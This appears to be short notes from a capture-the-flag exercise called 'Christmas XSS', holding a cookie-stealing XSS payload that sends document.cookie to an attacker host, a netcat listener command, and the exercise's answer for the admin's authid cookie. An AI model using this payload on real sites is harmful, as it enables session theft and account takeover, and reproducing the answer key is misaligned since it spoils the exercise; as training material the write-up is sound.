Christmas XSS

<script>window.location='http://<kali-ip>/?cookie='+document.cookie</script>

nc -lvnp 80
-> got cookie

Task

  • What is the admin’s authid cookie value?
    2564799a4e6689972f6d9e1c7b406f87065cbf65